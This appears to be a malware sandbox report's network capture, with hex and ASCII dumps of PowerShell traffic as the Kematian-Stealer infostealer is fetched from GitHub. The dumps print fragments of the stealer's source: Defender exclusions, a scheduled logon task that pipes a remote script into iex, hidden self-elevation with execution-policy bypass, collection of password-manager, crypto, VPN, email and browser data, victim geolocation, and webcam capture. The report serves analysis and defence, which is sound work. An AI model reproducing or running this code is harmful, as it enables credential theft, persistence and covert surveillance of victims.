                                      Data Ascii: #$webhook = "YOUR_URL_HERE_SERVER" #$debug = $false#$blockhostsfile = $false#$criticalprocess = $false#$melt = $false#$fakeerror = $false#$persistence = $false#$write_disk_only = $false#$vm_protect = $false#$encryption_key = "YOUR_ENC_KE
                                      2024-07-03 16:08:27 UTC1378INData Raw: 20 27 6e 74 64 6c 6c 2e 64 6c 6c 27 2c 0d 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 4d 65 74 68 6f 64 41 74 74 72 69 62 75 74 65 73 5d 3a 3a 50 75 62 6c 69 63 20 2d 62 6f 72 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 4d 65 74 68 6f 64 41 74 74 72 69 62 75 74 65 73 5d 3a 3a 53 74 61 74 69 63 20 2d 62 6f 72 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 4d 65 74 68 6f 64 41 74 74 72 69 62 75 74 65 73 5d 3a 3a 50 69 6e 76 6f 6b 65 49 6d 70 6c 2c 0d 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 49 6e 74 65 72 6f 70 53 65 72 76 69 63 65 73 2e 43 61 6c 6c 69 6e 67 43 6f 6e 76 65 6e 74 69 6f 6e 5d 3a 3a 57 69 6e 61 70 69 2c 20 5b 76 6f 69 64 5d 2c 20 5b 53 79 73
                                      Data Ascii: 'ntdll.dll', [System.Reflection.MethodAttributes]::Public -bor [System.Reflection.MethodAttributes]::Static -bor [System.Reflection.MethodAttributes]::PinvokeImpl, [System.Runtime.InteropServices.CallingConvention]::Winapi, [void], [Sys
                                      2024-07-03 16:08:27 UTC1378INData Raw: 72 65 61 64 69 6e 67 2e 45 76 65 6e 74 52 65 73 65 74 4d 6f 64 65 5d 3a 3a 4d 61 6e 75 61 6c 52 65 73 65 74 29 2c 20 22 47 6c 6f 62 61 6c 5c 24 41 70 70 49 44 22 2c 20 28 5b 72 65 66 5d 20 24 43 72 65 61 74 65 64 4e 65 77 29 0d 0a 20 20 20 20 69 66 20 28 2d 6e 6f 74 20 24 43 72 65 61 74 65 64 4e 65 77 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 22 5b 21 5d 20 41 6e 20 69 6e 73 74 61 6e 63 65 20 6f 66 20 74 68 69 73 20 73 63 72 69 70 74 20 69 73 20 61 6c 72 65 61 64 79 20 72 75 6e 6e 69 6e 67 2e 22 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 69 66 20 28 24 63 72 69 74 69 63 61 6c 70 72 6f 63 65 73 73 20 2d 61 6e 64 20 2d 6e 6f 74 20 24 64 65 62 75 67 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 43 72 69 74 69 63 61 6c 50 72 6f 63 65 73 73 20
                                      Data Ascii: reading.EventResetMode]::ManualReset), "Global\$AppID", ([ref] $CreatedNew) if (-not $CreatedNew) { throw "[!] An instance of this script is already running." } elseif ($criticalprocess -and -not $debug) { CriticalProcess
                                      2024-07-03 16:08:27 UTC1378INData Raw: 41 5c 54 65 6d 70 22 20 2d 46 6f 72 63 65 0d 0a 20 20 20 20 69 66 20 28 24 70 65 72 73 69 73 74 65 6e 63 65 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 4c 4f 43 41 4c 41 50 50 44 41 54 41 5c 54 65 6d 70 22 20 2d 46 6f 72 63 65 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 41 50 50 44 41 54 41 5c 4b 65 6d 61 74 69 61 6e 22 20 2d 46 6f 72 63 65 0d 0a 20 20 20 20 20 20 20 20 24 4b 44 4f 54 5f 44 49 52 20 3d 20 4e 65 77 2d 49 74 65 6d 20 2d 49 74 65 6d 54 79 70 65 20 44 69 72 65 63 74 6f 72 79 20 2d 50 61 74 68 20 22 24 65 6e 76 3a 41 50 50 44 41 54 41 5c
                                      Data Ascii: A\Temp" -Force if ($persistence) { Add-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Temp" -Force Add-MpPreference -ExclusionPath "$env:APPDATA\Kematian" -Force $KDOT_DIR = New-Item -ItemType Directory -Path "$env:APPDATA\
                                      2024-07-03 16:08:27 UTC1378INData Raw: 74 69 61 6e 2d 53 74 65 61 6c 65 72 2f 6d 61 69 6e 2f 66 72 6f 6e 74 65 6e 64 2d 73 72 63 2f 6d 61 69 6e 2e 70 73 31 27 7c 69 65 78 60 22 2c 30 29 28 77 69 6e 64 6f 77 2e 63 6c 6f 73 65 29 22 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 24 74 61 73 6b 5f 74 72 69 67 67 65 72 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 54 72 69 67 67 65 72 20 2d 41 74 4c 6f 67 4f 6e 0d 0a 20 20 20 20 20 20 20 20 24 74 61 73 6b 5f 73 65 74 74 69 6e 67 73 20 3d 20 4e 65 77 2d 53 63 68 65 64 75 6c 65 64 54 61 73 6b 53 65 74 74 69 6e 67 73 53 65 74 20 2d 41 6c 6c 6f 77 53 74 61 72 74 49 66 4f 6e 42 61 74 74 65 72 69 65 73 20 2d 44 6f 6e 74 53 74 6f 70 49 66 47 6f 69 6e 67 4f 6e 42 61 74 74 65 72 69 65 73 20 2d 52 75 6e 4f 6e 6c 79 49 66 4e 65
                                      Data Ascii: tian-Stealer/main/frontend-src/main.ps1'|iex`",0)(window.close)" } $task_trigger = New-ScheduledTaskTrigger -AtLogOn $task_settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -RunOnlyIfNe
                                      2024-07-03 16:08:27 UTC1378INData Raw: 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 4e 6f 50 20 2d 45 70 20 42 79 70 61 73 73 20 2d 46 69 6c 65 20 60 22 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 60 22 22 20 2d 56 65 72 62 20 52 75 6e 41 73 3b 20 65 78 69 74 20 7d 20 63 61 74 63 68 20 7b 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 72 79 20 7b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 22 70 6f 77 65 72 73 68 65 6c 6c 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2d 57 69 6e 20 48 69 64 64 65 6e 20 2d 4e 6f 50 20 2d 45 70 20 42 79 70 61 73 73 20 2d 46 69 6c 65 20 60 22 24 50 53 43 6f 6d 6d 61 6e 64 50 61 74 68 60 22 22 20 2d 56 65 72 62 20 52 75 6e 41 73 3b 20 65 78 69 74 20 7d 20 63 61 74 63 68
                                      Data Ascii: " -ArgumentList "-NoP -Ep Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit } catch {} } else { try { Start-Process "powershell" -ArgumentList "-Win Hidden -NoP -Ep Bypass -File `"$PSCommandPath`"" -Verb RunAs; exit } catch
                                      2024-07-03 16:08:27 UTC1378INData Raw: 20 44 61 74 61 22 0d 0a 20 20 20 20 24 66 74 70 5f 63 6c 69 65 6e 74 73 20 3d 20 22 24 66 6f 6c 64 65 72 66 6f 72 6d 61 74 5c 46 54 50 20 43 6c 69 65 6e 74 73 22 0d 0a 20 20 20 20 24 70 61 73 73 77 6f 72 64 5f 6d 61 6e 61 67 65 72 73 20 3d 20 22 24 66 6f 6c 64 65 72 66 6f 72 6d 61 74 5c 50 61 73 73 77 6f 72 64 20 4d 61 6e 61 67 65 72 73 22 20 0d 0a 0d 0a 20 20 20 20 24 66 6f 6c 64 65 72 73 20 3d 20 40 28 24 66 6f 6c 64 65 72 5f 67 65 6e 65 72 61 6c 2c 20 24 66 6f 6c 64 65 72 5f 6d 65 73 73 61 67 69 6e 67 2c 20 24 66 6f 6c 64 65 72 5f 67 61 6d 69 6e 67 2c 20 24 66 6f 6c 64 65 72 5f 63 72 79 70 74 6f 2c 20 24 66 6f 6c 64 65 72 5f 76 70 6e 2c 20 24 66 6f 6c 64 65 72 5f 65 6d 61 69 6c 2c 20 24 69 6d 70 6f 72 74 61 6e 74 5f 66 69 6c 65 73 2c 20 24 62 72 6f 77
                                      Data Ascii: Data" $ftp_clients = "$folderformat\FTP Clients" $password_managers = "$folderformat\Password Managers" $folders = @($folder_general, $folder_messaging, $folder_gaming, $folder_crypto, $folder_vpn, $folder_email, $important_files, $brow
                                      2024-07-03 16:08:27 UTC1378INData Raw: 70 20 60 6e 43 6f 75 6e 74 72 79 3a 20 24 63 6f 75 6e 74 72 79 20 60 6e 52 65 67 69 6f 6e 3a 20 24 72 65 67 69 6f 6e 4e 61 6d 65 20 60 6e 43 69 74 79 3a 20 24 63 69 74 79 20 60 6e 49 53 50 3a 20 24 69 73 70 20 60 6e 4c 61 74 69 74 75 64 65 3a 20 24 6c 61 74 20 60 6e 4c 6f 6e 67 69 74 75 64 65 3a 20 24 6c 6f 6e 20 60 6e 5a 69 70 3a 20 24 7a 69 70 20 60 6e 56 50 4e 2f 50 72 6f 78 79 3a 20 24 68 6f 73 74 69 6e 67 22 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 24 6e 65 74 77 6f 72 6b 69 6e 66 6f 20 3d 20 47 65 74 2d 4e 65 74 77 6f 72 6b 0d 0a 20 20 20 20 24 6c 61 6e 67 20 3d 20 28 47 65 74 2d 57 69 6e 55 73 65 72 4c 61 6e 67 75 61 67 65 4c 69 73 74 29 2e 4c 6f 63 61 6c 69 7a 65 64 4e 61 6d 65 0d 0a 20 20 20 20 24 64 61 74 65 20 3d 20 47 65 74 2d 44 61 74 65
                                      Data Ascii: p `nCountry: $country `nRegion: $regionName `nCity: $city `nISP: $isp `nLatitude: $lat `nLongitude: $lon `nZip: $zip `nVPN/Proxy: $hosting" } $networkinfo = Get-Network $lang = (Get-WinUserLanguageList).LocalizedName $date = Get-Date
                                      2024-07-03 16:08:27 UTC1378INData Raw: 67 75 69 64 53 74 72 69 6e 67 20 3d 20 24 67 75 69 64 2e 54 6f 53 74 72 69 6e 67 28 29 0d 0a 20 20 20 20 24 73 75 66 66 69 78 20 3d 20 24 67 75 69 64 53 74 72 69 6e 67 2e 53 75 62 73 74 72 69 6e 67 28 30 2c 20 38 29 20 20 0d 0a 20 20 20 20 24 70 72 65 66 69 78 65 64 47 75 69 64 20 3d 20 22 4b 65 6d 61 74 69 61 6e 2d 53 74 65 61 6c 65 72 2d 22 20 2b 20 24 73 75 66 66 69 78 0d 0a 20 20 20 20 24 6b 65 6d 61 74 69 61 6e 5f 62 61 6e 6e 65 72 20 3d 20 28 22 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57
                                      Data Ascii: guidString = $guid.ToString() $suffix = $guidString.Substring(0, 8) $prefixedGuid = "Kematian-Stealer-" + $suffix $kematian_banner = ("4pWU4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pWQ4pW
                                      2024-07-03 16:08:27 UTC1378INData Raw: 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 64 34 70 57 61 34 70 57 51 34 70 57 51 34 70 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 64 34 70 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 51 34 70 57 64 34 70 61 49 34 70 61 49 34 70 57 55 34 70 57 51 34 70 57 51 34 70 61 49 34 70 61 49 34 70 57 58 34 70 61 49 34 70 61 49 34 70 57 52 49 43 41 67 49 43 44 69 6c 6f 6a 69 6c 6f 6a 69 6c 5a 54 69 6c 5a 44 69 6c 5a 44 69 6c 5a 44 69 6c 5a 44 69 6c 5a 33 69 6c 6f 6a 69 6c 6f 6a 69 6c 5a 54 69 6c 5a 44 69 6c 5a 44 69 6c 6f 6a 69 6c 6f 6a 69 6c 5a 66 69 6c 5a 45 4e 43 75 4b 56 6b 65 4b 57 69 4f 4b 57 69 4f 4b 57 69 4f 4b 57 69 4f 4b 57 69 4f 4b 56 6c 4f 4b 56 6e 53 44 69 6c
                                      Data Ascii: aI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4pWa4pWQ4pWQ4paI4paI4pWU4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWRICAgICDilojilojilZTilZDilZDilZDilZDilZ3ilojilojilZTilZDilZDilojilojilZfilZENCuKVkeKWiOKWiOKWiOKWiOKWiOKVlOKVnSDil


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.749715104.16.123.964437696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:30 UTC176OUTGET /cdn-cgi/trace HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: www.cloudflare.com
                                      Connection: Keep-Alive
                                      2024-07-03 16:08:30 UTC332INHTTP/1.1 200 OK
                                      Date: Wed, 03 Jul 2024 16:08:30 GMT
                                      Content-Type: text/plain
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Access-Control-Allow-Origin: *
                                      Server: cloudflare
                                      CF-RAY: 89d822770edf42cb-EWR
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                      Cache-Control: no-cache
                                      2024-07-03 16:08:30 UTC285INData Raw: 31 31 36 0d 0a 66 6c 3d 36 35 30 66 31 38 36 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 0a 74 73 3d 31 37 32 30 30 32 32 39 31 30 2e 35 36 38 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 65 6e 2d 55 53 29 20 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 2f 35 2e 31 2e 31 39 30 34 31 2e 31 36 38 32 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 6e 6f 6e 65 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66 66 0a 67 61 74
                                      Data Ascii: 116fl=650f186h=www.cloudflare.comip=8.46.123.33ts=1720022910.568visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=nonehttp=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=offgat
                                      2024-07-03 16:08:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.749716104.16.123.964437696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:31 UTC152OUTGET /cdn-cgi/trace HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: www.cloudflare.com
                                      2024-07-03 16:08:31 UTC332INHTTP/1.1 200 OK
                                      Date: Wed, 03 Jul 2024 16:08:31 GMT
                                      Content-Type: text/plain
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Access-Control-Allow-Origin: *
                                      Server: cloudflare
                                      CF-RAY: 89d8227b0d2842b9-EWR
                                      X-Frame-Options: DENY
                                      X-Content-Type-Options: nosniff
                                      Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                      Cache-Control: no-cache
                                      2024-07-03 16:08:31 UTC290INData Raw: 31 31 62 0d 0a 66 6c 3d 36 35 30 66 31 37 30 0a 68 3d 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0a 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 0a 74 73 3d 31 37 32 30 30 32 32 39 31 31 2e 32 30 37 0a 76 69 73 69 74 5f 73 63 68 65 6d 65 3d 68 74 74 70 73 0a 75 61 67 3d 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 69 6e 64 6f 77 73 20 4e 54 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 65 6e 2d 55 53 29 20 57 69 6e 64 6f 77 73 50 6f 77 65 72 53 68 65 6c 6c 2f 35 2e 31 2e 31 39 30 34 31 2e 31 36 38 32 0a 63 6f 6c 6f 3d 45 57 52 0a 73 6c 69 76 65 72 3d 30 31 30 2d 74 69 65 72 31 0a 68 74 74 70 3d 68 74 74 70 2f 31 2e 31 0a 6c 6f 63 3d 55 53 0a 74 6c 73 3d 54 4c 53 76 31 2e 33 0a 73 6e 69 3d 70 6c 61 69 6e 74 65 78 74 0a 77 61 72 70 3d 6f 66
                                      Data Ascii: 11bfl=650f170h=www.cloudflare.comip=8.46.123.33ts=1720022911.207visit_scheme=httpsuag=Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682colo=EWRsliver=010-tier1http=http/1.1loc=UStls=TLSv1.3sni=plaintextwarp=of
                                      2024-07-03 16:08:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.749720140.82.121.34431920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:38 UTC121OUTGET /Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1 HTTP/1.1
                                      Host: github.com
                                      Connection: Keep-Alive
                                      2024-07-03 16:08:38 UTC572INHTTP/1.1 302 Found
                                      Server: GitHub.com
                                      Date: Wed, 03 Jul 2024 16:08:38 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                      Access-Control-Allow-Origin:
                                      Location: https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1
                                      Cache-Control: no-cache
                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                      X-Frame-Options: deny
                                      X-Content-Type-Options: nosniff
                                      X-XSS-Protection: 0
                                      Referrer-Policy: no-referrer-when-downgrade
                                      2024-07-03 16:08:38 UTC3028INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                      Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.749721185.199.109.1334431920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-03 16:08:39 UTC132OUTGET /Somali-Devs/Kematian-Stealer/main/frontend-src/webcam.ps1 HTTP/1.1
                                      Host: raw.githubusercontent.com
                                      Connection: Keep-Alive
                                      2024-07-03 16:08:39 UTC898INHTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 6453
                                      Cache-Control: max-age=300
                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                      Content-Type: text/plain; charset=utf-8
                                      ETag: "b50d2c1034106e88552448ec70d0c1c0b89ade259fb54cca4421fb16c45cbe01"
                                      Strict-Transport-Security: max-age=31536000
                                      X-Content-Type-Options: nosniff
                                      X-Frame-Options: deny
                                      X-XSS-Protection: 1; mode=block
                                      X-GitHub-Request-Id: 30B3:33A73:425B2:49948:66857786
                                      Accept-Ranges: bytes
                                      Date: Wed, 03 Jul 2024 16:08:39 GMT
                                      Via: 1.1 varnish
                                      X-Served-By: cache-nyc-kteb1890070-NYC
                                      X-Cache: MISS
                                      X-Cache-Hits: 0
                                      X-Timer: S1720022919.209736,VS0,VE464
                                      Vary: Authorization,Accept-Encoding,Origin
                                      Access-Control-Allow-Origin: *
                                      Cross-Origin-Resource-Policy: cross-origin
                                      X-Fastly-Request-ID: 1ba617735a217fbc96077f303bc230ee43f82a92
                                      Expires: Wed, 03 Jul 2024 16:13:39 GMT
                                      Source-Age: 0
                                      2024-07-03 16:08:39 UTC1378INData Raw: 66 75 6e 63 74 69 6f 6e 20 47 65 74 2d 57 65 62 43 61 6d 49 6d 61 67 65 20 7b 0a 20 20 20 20 23 20 6d 61 64 65 20 62 79 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 74 65 66 61 6e 73 74 72 61 6e 67 65 72 2f 50 6f 77 65 72 53 68 65 6c 6c 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 47 65 74 2d 57 65 62 43 61 6d 70 2e 70 73 31 0a 20 20 20 20 24 73 6f 75 72 63 65 20 3d 20 40 22 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 54 65 78 74 3b 20 0a 20 20 20 20 75 73 69 6e 67 20 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 3b 20 0a 20 20 20 20 75 73 69 6e 67 20
                                      Data Ascii: function Get-WebCamImage { # made by https://github.com/stefanstranger/PowerShell/blob/master/Get-WebCamp.ps1 $source = @" using System; using System.Collections.Generic; using System.Text; using System.Collections; using
                                      2024-07-03 16:08:39 UTC1378INData Raw: 50 6f 69 6e 74 20 3d 20 22 53 65 6e 64 4d 65 73 73 61 67 65 41 22 29 5d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 69 6e 74 20 53 65 6e 64 4d 65 73 73 61 67 65 28 69 6e 74 20 68 77 6e 64 2c 20 69 6e 74 20 77 4d 73 67 2c 20 69 6e 74 20 77 50 61 72 61 6d 2c 20 5b 4d 61 72 73 68 61 6c 41 73 28 55 6e 6d 61 6e 61 67 65 64 54 79 70 65 2e 41 73 41 6e 79 29 5d 20 6f 62 6a 65 63 74 20 6c 50 61 72 61 6d 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 5b 44 6c 6c 49 6d 70 6f 72 74 28 22 75 73 65 72 33 32 22 29 5d 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 74 65 63 74 65 64 20 73 74 61 74 69 63 20 65 78 74 65 72 6e 20 69 6e 74 20 53 65 74 57 69 6e 64 6f 77 50 6f 73 28 69 6e
                                      Data Ascii: Point = "SendMessageA")] protected static extern int SendMessage(int hwnd, int wMsg, int wParam, [MarshalAs(UnmanagedType.AsAny)] object lParam); [DllImport("user32")] protected static extern int SetWindowPos(in
                                      2024-07-03 16:08:39 UTC1378INData Raw: 4c 44 2c 20 30 2c 20 30 2c 20 77 69 6e 64 6f 77 57 69 64 74 68 2c 20 77 69 6e 64 6f 77 48 65 69 67 68 74 2c 20 68 61 6e 64 6c 65 2c 20 30 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 53 65 6e 64 4d 65 73 73 61 67 65 28 64 65 76 69 63 65 48 61 6e 64 6c 65 2c 20 57 4d 5f 43 41 50 5f 44 52 49 56 45 52 5f 43 4f 4e 4e 45 43 54 2c 20 74 68 69 73 2e 69 6e 64 65 78 2c 20 30 29 20 3e 20 30 29 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 53 65 6e 64 4d 65 73 73 61 67 65 28 64 65 76 69 63 65 48 61 6e 64 6c 65 2c 20 57 4d 5f 43 41 50 5f 53 45 54 5f 53 43 41 4c 45 2c 20 2d 31 2c 20 30 29 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: LD, 0, 0, windowWidth, windowHeight, handle, 0); if (SendMessage(deviceHandle, WM_CAP_DRIVER_CONNECT, this.index, 0) > 0) { SendMessage(deviceHandle, WM_CAP_SET_SCALE, -1, 0);
                                      2024-07-03 16:08:39 UTC1378INData Raw: 20 6c 70 73 7a 4e 61 6d 65 2c 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 20 63 62 4e 61 6d 65 2c 20 5b 4d 61 72 73 68 61 6c 41 73 28 55 6e 6d 61 6e 61 67 65 64 54 79 70 65 2e 56 42 42 79 52 65 66 53 74 72 29 5d 20 72 65 66 20 53 74 72 69 6e 67 20 6c 70 73 7a 56 65 72 2c 20 69 6e 74 20 63 62 56 65 72 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 74 61 74 69 63 20 41 72 72 61 79 4c 69 73 74 20 64 65 76 69 63 65 73 20 3d 20 6e 65 77 20 41 72 72 61 79 4c 69 73 74 28 29 3b 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 75 62 6c 69 63 20 73 74 61 74 69 63 20 44 65 76 69 63 65 5b 5d 20 47 65 74 41 6c 6c 44 65 76 69 63 65 73 28 29 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: lpszName, int cbName, [MarshalAs(UnmanagedType.VBByRefStr)] ref String lpszVer, int cbVer); static ArrayList devices = new ArrayList(); public static Device[] GetAllDevices() {
                                      2024-07-03 16:08:39 UTC941INData Raw: 62 6c 79 5d 3a 3a 6c 6f 61 64 77 69 74 68 70 61 72 74 69 61 6c 6e 61 6d 65 28 22 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 22 29 20 7c 20 4f 75 74 2d 4e 75 6c 6c 20 0a 20 20 20 20 20 20 20 20 5b 72 65 66 6c 65 63 74 69 6f 6e 2e 61 73 73 65 6d 62 6c 79 5d 3a 3a 6c 6f 61 64 77 69 74 68 70 61 72 74 69 61 6c 6e 61 6d 65 28 22 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 22 29 20 7c 20 4f 75 74 2d 4e 75 6c 6c 20 0a 20 20 20 20 20 20 20 20 24 70 69 63 43 61 70 74 75 72 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 2e 50 69 63 74 75 72 65 42 6f 78 20 0a 20 20 20 20 20 20 20 20 74 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 64 65 76 69 63 65 73 20 3d 20 5b 57 65 62 43 61 6d 4c 69
